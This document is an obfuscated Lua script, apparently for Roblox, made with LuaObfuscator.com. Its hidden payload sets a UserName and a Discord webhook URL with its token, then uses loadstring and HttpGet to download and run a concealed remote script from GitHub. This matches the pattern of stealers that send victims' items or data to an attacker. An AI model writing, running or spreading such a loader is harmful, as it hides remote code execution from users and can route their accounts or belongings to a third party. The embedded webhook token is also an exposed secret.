--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v67=0;local v68;while true do if (v67==0) then v68=v2(v0(v30,16));if v19 then local v101=0;local v102;while true do if (v101==1) then return v102;end if (v101==0) then v102=v5(v68,v19);v19=nil;v101=1;end end else return v68;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v69=(v31/((5 -3)^(v32-(878 -(282 + 595)))))%((1639 -(1523 + 114))^(((v33-(2 -1)) -(v32-((2 -1) -0))) + (1066 -((1025 -(892 + 65)) + 997)))) ;return v69-(v69%(1 -0)) ;else local v70=0 -0 ;local v71;while true do if (v70==(619 -(555 + 64))) then v71=((1724 -791) -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v71 + v71))>=v71) and (928 -(214 + 713))) or (0 + (0 -0)) ;end end end end local function v21()local v34=350 -(87 + 263) ;local v35;while true do if (v34==(181 -(67 + 113))) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + (2 -1) ;v34=1 + (0 -0) ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (954 -(802 + 150)) );v18=v18 + (5 -3) ;return (v37 * (464 -208)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + ((2188 -(1069 + 118)) -(915 + 82)) ;return (v41 * (47505959 -30728743)) + (v40 * (38178 + 27358)) + (v39 * (336 -80)) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=2 -1 ;local v45=(v20(v43,1 -0 ,4 + 16 ) * ((3 -1)^(32 + (0 -0)))) + v42 ;local v46=v20(v43,812 -(368 + 423) ,97 -66 );local v47=((v20(v43,(30 + 20) -((36 -26) + 8) )==(3 -2)) and  -(443 -(416 + 26))) or (3 -2) ;if (v46==(0 + 0)) then if (v45==(0 -0)) then return v47 * (0 -0) ;else v46=1;v44=0;end elseif (v46==(2485 -(145 + 293))) then return ((v45==(430 -(44 + 386))) and (v47 * ((1487 -((1857 -(814 + 45)) + 488))/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(838 + 185) ) * (v44 + (v45/((774 -(201 + 571))^(1190 -(116 + 1022))))) ;end local function v25(v48)local v49=0 + 0 ;local v50;local v51;while true do if (v49==((6 -4) -(1748 -(760 + 987)))) then v50=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;v49=1 + 1 ;end if (v49==(887 -(261 + 624))) then v51={};for v78=1 -(1913 -(1789 + 124)) , #v50 do v51[v78]=v2(v1(v3(v50,v78,v78)));end v49=3;end if (v49==0) then v50=nil;if  not v48 then local v96=0;while true do if (v96==(1080 -(1020 + (826 -(745 + 21))))) then v48=v23();if (v48==(1423 -(630 + 793))) then return "";end break;end end end v49=3 -2 ;end if (v49==(14 -11)) then return v6(v51);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 + 0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v52~=(1690 -(209 + 1481))) then else v53=0;v54=nil;v52=2 -1 ;end if (3==v52) then v59=nil;while true do local v80=1636 -(1373 + 263) ;local v81;while true do if (v80~=0) then else v81=0;while true do if (v81~=0) then else local v107=0;local v108;while true do if ((1000 -(451 + 549))==v107) then v108=0 + 0 ;while true do if (v108~=0) then else local v141=0 -0 ;while true do if (v141==1) then v108=1;break;end if (v141==(0 -0)) then if (2~=v53) then else local v185=0;local v186;while true do if (0==v185) then v186=1384 -(746 + 638) ;while true do local v189=0;local v190;while true do if (v189~=0) then else v190=0 + 0 ;while true do if (0~=v190) then else if (v186~=(1 -0)) then else return v57;end if (v186==0) then for v200=342 -(218 + 123) ,v23() do local v201=1581 -(1535 + 46) ;local v202;while true do if (v201~=(0 + 0)) then else v202=v21();if (v20(v202,1,1)==(0 + 0)) then local v207=560 -(306 + 254) ;local v208;local v209;local v210;while true do if (0==v207) then local v211=0;local v212;while true do if (v211==0) then v212=0;while true do if (v212==(1 + 0)) then v207=1;break;end if (v212==(0 -0)) then v208=v20(v202,1469 -(899 + 568) ,2 + 1 );v209=v20(v202,9 -5 ,609 -(268 + 335) );v212=291 -(60 + 230) ;end end break;end end end if (1==v207) then v210={v22(),v22(),nil,nil};if (v208==(572 -(426 + 146))) then local v216=0;local v217;local v218;while true do if ((0 + 0)~=v216) then else v217=1456 -(282 + 1174) ;v218=nil;v216=1;end if (v216~=(812 -(569 + 242))) then else while true do if (v217==(0 -0)) then v218=0 + 0 ;while true do if (v218==0) then v210[3]=v22();v210[1028 -(706 + 318) ]=v22();break;end end break;end end break;end end elseif (v208==(1252 -(721 + 530))) then v210[1274 -(945 + 326) ]=v23();elseif (v208==(4 -2)) then v210[3]=v23() -(2^16) ;elseif (v208==(3 + 0)) then local v224=700 -(271 + 429) ;local v225;local v226;while true do if (v224~=(0 + 0)) then else v225=0;v226=nil;v224=1501 -(1408 + 92) ;end if (v224~=(1087 -(461 + 625))) then else while true do if ((1288 -(993 + 295))==v225) then v226=0 + 0 ;while true do if (v226~=0) then else v210[3]=v23() -(2^16) ;v210[4]=v22();break;end end break;end end break;end end end v207=2;end if (v207~=(1174 -(418 + 753))) then else if (v20(v209,2 + 1 ,3)~=(1 + 0)) then else v210[4]=v59[v210[4]];end v54[v200]=v210;break;end if (v207~=2) then else local v214=0 + 0 ;local v215;while true do if (v214~=(0 + 0)) then else v215=0;while true do if (v215~=1) then else v207=3;break;end if (v215~=(529 -(406 + 123))) then else local v223=0;while true do if (v223==1) then v215=1770 -(1749 + 20) ;break;end if (v223~=(0 + 0)) then else if (v20(v209,1,1)==1) then v210[1324 -(1249 + 73) ]=v59[v210[1 + 1 ]];end if (v20(v209,2,1147 -(466 + 679) )~=1) then else v210[6 -3 ]=v59[v210[3]];end v223=2 -1 ;end end end end break;end end end end end break;end end end for v203=1901 -(106 + 1794) ,v23() do v55[v203-(1 + 0) ]=v28();end v186=1;end break;end end break;end end end break;end end end if ((1 + 0)==v53) then local v187=0 -0 ;local v188;while true do if (v187~=(0 -0)) then else v188=0;while true do if (v188~=2) then else v53=116 -(4 + 110) ;break;end if (1==v188) then local v191=584 -(57 + 527) ;while true do if (v191~=(1428 -(41 + 1386))) then else v188=105 -(17 + 86) ;break;end if (v191~=0) then else for v195=1 + 0 ,v58 do local v196=0;local v197;local v198;local v199;while true do if (v196~=0) then else local v205=0;while true do if (v205~=1) then else v196=1 -0 ;break;end if (v205~=0) then else v197=0;v198=nil;v205=2 -1 ;end end end if (v196==(167 -(122 + 44))) then v199=nil;while true do if (v197==1) then if (v198==(1 -0)) then v199=v21()~=(0 -0) ;elseif (v198==2) then v199=v24();elseif (v198~=3) then else v199=v25();end v59[v195]=v199;break;end if (v197==(0 + 0)) then v198=v21();v199=nil;v197=1;end end break;end end end v57[1 + 2 ]=v21();v191=1;end end end if (0~=v188) then else local v192=0;while true do if (v192~=(0 -0)) then else local v194=0;while true do if (v194==0) then v58=v23();v59={};v194=66 -(30 + 35) ;end if (v194~=(1 + 0)) then else v192=1;break;end end end if (v192==1) then v188=1258 -(1043 + 214) ;break;end end end end break;end end end v141=1;end end end if (1~=v108) then else v81=1;break;end end break;end end end if (v81==(3 -2)) then if (v53==0) then local v113=1212 -(323 + 889) ;while true do if (v113==(5 -3)) then v53=581 -(361 + 219) ;break;end if (v113==(321 -(53 + 267))) then local v137=0 + 0 ;while true do if (v137==(414 -(15 + 398))) then v113=984 -(18 + 964) ;break;end if ((0 -0)==v137) then v56={};v57={v54,v55,nil,v56};v137=1;end end end if (v113~=0) then else local v138=0 + 0 ;local v139;while true do if (v138==(850 -(20 + 830))) then v139=0 + 0 ;while true do if (v139==0) then v54={};v55={};v139=1;end if (v139~=1) then else v113=1;break;end end break;end end end end end break;end end break;end end end break;end if (v52~=1) then else local v72=126 -(116 + 10) ;local v73;while true do if (0~=v72) then else v73=0 + 0 ;while true do if (v73~=1) then else v52=740 -(542 + 196) ;break;end if (v73~=(0 -0)) then else v55=nil;v56=nil;v73=1 + 0 ;end end break;end end end if (v52==2) then local v74=0;while true do if (1==v74) then v52=2 + 1 ;break;end if (v74==0) then local v100=0;while true do if (v100==(1 + 0)) then v74=2 -1 ;break;end if (v100==(0 -0)) then v57=nil;v58=nil;v100=1552 -(1126 + 425) ;end end end end end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end if (1==v63) then v66=v60[3];return function(...)local v82=v64;local v83=v65;local v84=v66;local v85=v27;local v86=1;local v87= -1;local v88={};local v89={...};local v90=v12("#",...) -1 ;local v91={};local v92={};for v97=0,v90 do if (v97>=v84) then v88[v97-v84 ]=v89[v97 + 1 ];else v92[v97]=v89[v97 + 1 ];end end local v93=(v90-v84) + 1 ;local v94;local v95;while true do v94=v82[v86];v95=v94[1];if (v95<=5) then if (v95<=2) then if (v95<=0) then v62[v94[3]]=v92[v94[2]];elseif (v95==1) then v92[v94[2]]=v62[v94[3]];else local v116=v94[2];v92[v116]=v92[v116](v13(v92,v116 + 1 ,v87));end elseif (v95<=3) then do return;end elseif (v95>4) then local v118=0;local v119;local v120;while true do if (v118==0) then v119=v94[2];v120=v92[v94[3]];v118=1;end if (v118==1) then v92[v119 + 1 ]=v120;v92[v119]=v120[v94[4]];break;end end else v92[v94[2]]();end elseif (v95<=8) then if (v95<=6) then v92[v94[2]]=v94[3];elseif (v95>7) then local v121=v94[2];local v122,v123=v85(v92[v121](v13(v92,v121 + 1 ,v94[3])));v87=(v123 + v121) -1 ;local v124=0;for v134=v121,v87 do v124=v124 + 1 ;v92[v134]=v122[v124];end else local v125=0;while true do if (v125==3) then v86=v94[3];break;end if (v125==1) then v86=v86 + 1 ;v94=v82[v86];v62[v94[3]]=v92[v94[2]];v86=v86 + 1 ;v125=2;end if (v125==0) then v62[v94[3]]=v92[v94[2]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v94[3];v125=1;end if (v125==2) then v94=v82[v86];v92[v94[2]]=v94[3];v86=v86 + 1 ;v94=v82[v86];v125=3;end end end elseif (v95<=10) then if (v95==9) then local v126=0;local v127;local v128;local v129;local v130;local v131;while true do if (v126==0) then v127=nil;v128,v129=nil;v130=nil;v131=nil;v62[v94[3]]=v92[v94[2]];v126=1;end if (v126==3) then v92[v131 + 1 ]=v130;v92[v131]=v130[v94[4]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v94[3];v126=4;end if (v126==7) then v94=v82[v86];v92[v94[2]]();v86=v86 + 1 ;v94=v82[v86];v86=v94[3];break;end if (v126==6) then v86=v86 + 1 ;v94=v82[v86];v131=v94[2];v92[v131]=v92[v131](v13(v92,v131 + 1 ,v87));v86=v86 + 1 ;v126=7;end if (v126==5) then v131=v94[2];v128,v129=v85(v92[v131](v13(v92,v131 + 1 ,v94[3])));v87=(v129 + v131) -1 ;v127=0;for v182=v131,v87 do v127=v127 + 1 ;v92[v182]=v128[v127];end v126=6;end if (v126==1) then v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v62[v94[3]];v86=v86 + 1 ;v94=v82[v86];v126=2;end if (v126==4) then v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v94[3]~=0 ;v86=v86 + 1 ;v94=v82[v86];v126=5;end if (v126==2) then v92[v94[2]]=v62[v94[3]];v86=v86 + 1 ;v94=v82[v86];v131=v94[2];v130=v92[v94[3]];v126=3;end end else v92[v94[2]]=v94[3]~=0 ;end elseif (v95==11) then v86=v94[3];elseif (v92[v94[2]]==v94[4]) then v86=v86 + 1 ;else v86=v94[3];end v86=v86 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D6532030E3O006F6E657069656365313233747A78030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574035D3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F5661706F72656F6E536372697074732F4469616D6F6E642F6D61696E2F50726F7465637465645F3137363733312O3739313437333431362E6C756103083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3134383536383332313936352O34313039362F70615553416A7561737A3574364262685546364A543846733268475F3649674C46716636336F4D305242382O5F636652765649456A325159686B714B77304D726A2O435500173O0012063O00013O00260C3O000E0001000200040B3O000E0001001206000100043O001209000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000500016O000200056O00013O00024O00010001000100044O0016000100260C3O00010001000100040B3O00010001001206000100043O001207000100093O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O00033O00017O00",v9(),...);
